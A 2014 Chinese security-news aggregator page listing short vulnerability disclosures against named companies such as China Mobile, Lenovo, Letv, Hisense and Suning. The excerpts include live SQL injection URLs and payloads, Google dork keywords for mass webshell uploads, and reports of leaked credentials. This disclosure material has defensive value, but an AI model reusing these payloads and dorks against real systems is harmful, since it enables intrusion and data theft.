记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国移动某管理系统存在Struts2漏洞已shell

河南移动的一个后台管理系统,感觉是最近新上线的。有struts2漏洞(S2-016)http://112.53.127.12:8082/admin/login/vexist.action等等上一句话,菜刀一连上大马,连Oracle,某个表的数据量,整个库应该是几十上百万的数据咯而且这个站可以用来发短信,那传播量可想而知。至于内网啥的就不搞了 漏洞证明: 修复方案:打补丁,限IP。
发布时间:2014-12-20 18:01 | 阅读:164 | 评论:0 | 标签:漏洞

火球网任意用户密码重置漏洞附官方百万余额账户演示

该重置密码接口需要一个用户唯一编号,由于火球网整个架构基本都不涉及这个参数,找了好些时间才发现这玩意儿!先说登陆,我们有了用户邮箱(这里不一定是邮箱,测试的结果发现用户登录的用户名是唯一的)和密码才能登陆。走吧,跟我一起去瞅瞅百万余额账户,也变土豪了?#0 寻找用户名(登陆处使用)code 区域接口地址:https://www.huoqiu.cn//plan/ranklist.json{"ranklist":[{"totalSum":2000000.00,"nick":"xkbear"},{"totalSum":1300000.00,"nick":"jian***@huoqiur.c
发布时间:2014-12-20 18:01 | 阅读:81 | 评论:0 | 标签:漏洞

新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

新云cms建站系统存在ewebeditor上传和iis解析漏洞,可批量getshell.利用ewebeditor上传漏洞可以新建一个1.asp的文件夹,再配合iis的解析漏洞就可以成功的拿到shell.可通过谷歌获得大量的漏洞网站,关键字如下:inurl:Showservices.asp?id=inurl:showkbxx.asp?id=code 区域可通过谷歌获得大量的漏洞网站,关键字如下:inurl:Showservices.asp?id=inurl:showkbxx.asp?id=code 区域问题网址出现在:/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.aspcode
发布时间:2014-12-20 18:01 | 阅读:28 | 评论:0 | 标签:cms 漏洞

苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞

正常登录易购,打开我的互联界面,选择登录模式为短信验证码,获取验证码。http://10035.suning.com/mysnnet/login.htm手机号码不是本人,点了验证码也没有用啊。没关系,我们重放一下发送验证码的post请求POST /myauth/checkMobile.htm HTTP/1.1Host: 10035.suning.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConten
发布时间:2014-12-20 18:00 | 阅读:122 | 评论:0 | 标签:漏洞

海信内部高管会议系统存在漏洞可导致培训内容泄露

网址:http://v2.hisense.com:18080/Conf/jsp/main/mainAction.do这可是你们海信的网址哈,不知为啥里面写着“乐视培训”,不管了,反正是你们内部的事情,我不涉及。这里只有“乐视培训”频道在开会,好吧,点一下 尝试进入。昵称随便输入,密码是123456,服务器自动选择即可。(进入之前需要关闭IE浏览器安装各种插件及驱动)然后...就进来了,还有人在讲话,左边齐刷刷的各种分公司,截图了一下赶紧退了出来.不知道这个会议是否重要,但这确实是你们的内部网络了,赶紧加强密码吧。 漏洞证明:合影 修复方案:不要出现弱口令!
发布时间:2014-12-20 18:00 | 阅读:116 | 评论:0 | 标签:漏洞

如何破解政府外网数据库安全难题

一、政府外网安全背景分析 中国软件测评中心(中国国家工业和信息化部下属单位)2014年12月3日发布《2014年中国政府网站绩效评估总报告》显示,今年评估的900余家政府网站当中,超过93%的网站存在着本级的安全漏洞,其中97%的区县网站被监测到有安全隐患,接受评估的网站包括部委网站、省级政府网站、副省级政府网站、地市政府网站及区县政府网站。这个给政府的形象带来了很不利的影响,甚至给政府工作的正常运行带来了严重的威胁。 近两年暴露的大型安全事件中,主要以互联网公司或大型民营企业为主,如2013年的CSDN 600万用户信息泄露开始;2014年5月小米论坛疑似被“拖库”,该漏洞影响约有800万左右小米论坛用户,2014年3月,携程网也曾连续爆发安全漏洞。事实上,我国政府
发布时间:2014-12-20 14:20 | 阅读:346 | 评论:0 | 标签:无

某省电信网上营业厅订单物流信息可遍历

关键字为 inurl:distribution_showLogisticPage.do?orderNumber= 漏洞证明:http://www.hn.189.cn/eshop/distribution/distribution_showLogisticPage.do?orderNumber=20130111113233102521http://hn.189.cn/eshop/distribution/distribution_showLogisticPage.do?orderNumber=20140411185536866233 修复方案:。。
发布时间:2014-12-20 08:35 | 阅读:475 | 评论:0 | 标签:无

ThinkSNS第一弹SQL注入

ThinkSNS漏洞系列第一弹,某处处理不当导致SQL注入漏洞点出现在Comment Widget里: addonswidgetCommentWidgetCommentWidget.class.php:138/** * 添加评论的操作 * * @return array 评论添加状态和提示信息 */public function addcomment() { // 返回结果集默认值 $return = array ( 'status' => 0, 'data' => L ( 'PUBLIC_CONCENT_IS_ERROR' ) ); // 获取接收数据 $data = $_POST;
发布时间:2014-12-20 05:06 | 阅读:871 | 评论:0 | 标签:注入

74cms(20141027)多处二次注入

 1.user/company/company_ajax.phpelseif($act=="promotion_add_save"){************************report_deal($uid,2,$points);$user_points=get_user_points($uid);write_memberslog($uid,1,9001,$_SESSION['username'],"{$pro_cat['cat_name']}:<strong>{$jobs['jobs_name']}</strong>,推广 {$days} 天,(-{$points}),(剩余:{$user_
发布时间:2014-12-20 05:05 | 阅读:686 | 评论:0 | 标签:注入 cms

CoolPad backdoor CoolReaper

注:译文未获得平底锅授权,纯属学习性质翻译 原文:https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-cool-reaper.pdf 综述 宇龙酷派是中国第三大以及全球第六大智能手机生产厂商。最近我们研究发现许多高端酷派手机在预装软件均包含一个后门程序,我们将此后门称为:CoolReaper 在看到许多酷派用户反馈手机上的可疑现象后,我们下载了多个中国区发行的官方固件,其中大多数都包含了coolreaper这款后门应用。 CoolReaper表现出以下行为: 静默下载、安装或者激活任意应用且不通知用户 清楚用户数据、卸载已安装应用或者
发布时间:2014-12-20 02:20 | 阅读:840 | 评论:0 | 标签:技术分享 移动安全

乐视某Discuz论坛MySQL报错注入

uid可以注入:code 区域http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user()) x from information_schema.character_sets group by x)y).htmlError: Duplicate entry '1^^^letv@10.140.202.203' for key 'group_key' 漏洞证明:数据库: code 区域letv_forumletv_activityletv_cardletv_cmsletv_factory_pageletv_intranetl
发布时间:2014-12-19 23:20 | 阅读:948 | 评论:0 | 标签:注入 discuz

联想另一分站MySQL注射支持union

注入点:code 区域http://hao.lenovo.com/mps/api/safeNavList.php?cookieId=&pageName=1%27%20union%20all%20select%201%2C2%2C3%2C4%23几个参数都能注入。支持union。 漏洞证明:code 区域Database: nps[73 tables]+------------------------------+| version || banner || cats || cats_son || hots
发布时间:2014-12-19 23:20 | 阅读:741 | 评论:0 | 标签:无

联想又一分站MySQL注射

注入点:code 区域POST http://open.lenovo.com/data/eventDefineAction.do?method=getHideEventeventDefine=%7B%22appKey%22%3A%22IXZ28THWMVEM%22%2C%22eventAction%22%3A%22e%25%27%20AND%20sleep%2810%29%20AND%20%27000BYIu%27%21%3D%27000BYIu%25%22%2C%22eventName%22%3A%22%22%7D&getDataTotal=1&page=1&rows=10&sortOrderBy=&sortRule=desc参数eventDefine可注入。boole
发布时间:2014-12-19 23:20 | 阅读:794 | 评论:0 | 标签:无

9377某系统配置不当导致CDN各种泄漏

#1、由于9377所使用的gitlab存在配置不当,公共项目直接访问:code 区域http://183.61.131.242/lichengdong/scriptscode 区域http://183.61.131.242/lichengdong/scripts/blob/master/pw.txt#2、通过上面的得到里面有个pw.txt,里面各种泄漏(审核帮打下码tks):#3、通过上面信息拿下网宿、快网: 漏洞证明: 修复方案:
发布时间:2014-12-19 23:20 | 阅读:793 | 评论:0 | 标签:无

海信集团内部邮箱泄漏(可内网渗透)

code 区域https://github.com/jikaihu/work/blob/d29ee2bbb8d700c98df2c2d42a733fc46a1de128/logcollect/logexcel.py登陆地址;https://mail.hisense.com/点击Koa系统可直接登陆OA系统啊?VPN?VPN登陆地址;https://ssl.hisense.com/+CSCOE+/logon.htmloh my god...登陆成功 漏洞证明: 修复方案:删除github代码,更改密码,加强对员工的安全教育。
发布时间:2014-12-19 23:20 | 阅读:887 | 评论:0 | 标签:无

乐享云创Mugeda运维不当造成敏感信息泄漏并可伪造他人登录

网站首页采用的OpenSSL利用OpenSSL Heartbleed漏洞每次可以获得服务器64KB内存。造成Cookies泄漏:造成服务器证书信息泄漏: 漏洞证明:用获知的Cookies伪造用户登录:用户数据:用户个人(企业)信息: 修复方案:你们比我更专业~
发布时间:2014-12-19 23:20 | 阅读:909 | 评论:0 | 标签:无

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

工具

广而告知

标签云